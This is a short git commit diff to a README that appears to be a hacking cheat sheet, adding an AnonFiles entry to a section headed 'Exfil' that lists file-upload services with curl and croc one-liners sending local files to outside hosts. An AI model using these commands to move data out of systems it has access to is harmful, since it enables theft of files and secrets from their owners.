Update README.md

This commit is contained in:
skyper
2023-05-22 17:48:50 +01:00
committed by GitHub
parent 1175512957
commit 547150d78c
+4 -3
View File
@@ -1471,9 +1471,10 @@ Exfil
1. [Blitz](https://github.com/hackerschoice/gsocket#blitz) - `blitz -l / blitz foo.txt`
1. [Mega](https://mega.io/cmd)
1. ~~[BashUpload](https://bashupload.com/)~~
2. [Transfer.sh](https://transfer.sh/) - `curl --upload-file foo.txt https://transfer.sh`
3. [LitterBox](https://litterbox.catbox.moe/tools.php) - `curl -F reqtype=fileupload -F time=72h -F 'fileToUpload=@foo.txt' https://litterbox.catbox.moe/resources/internals/api.php`
4. [Croc](https://github.com/schollz/croc) - `croc send foo.txt / croc anit-price-example`
2. [AnonFiles](https://www.anonfiles.com) - `curl -F "file=@test.txt" https://api.anonfiles.com/upload`
3. [Transfer.sh](https://transfer.sh/) - `curl --upload-file foo.txt https://transfer.sh`
4. [LitterBox](https://litterbox.catbox.moe/tools.php) - `curl -F reqtype=fileupload -F time=72h -F 'fileToUpload=@foo.txt' https://litterbox.catbox.moe/resources/internals/api.php`
5. [Croc](https://github.com/schollz/croc) - `croc send foo.txt / croc anit-price-example`
6. [MagicWormhole](https://pypi.org/project/magic-wormhole/)
Publishing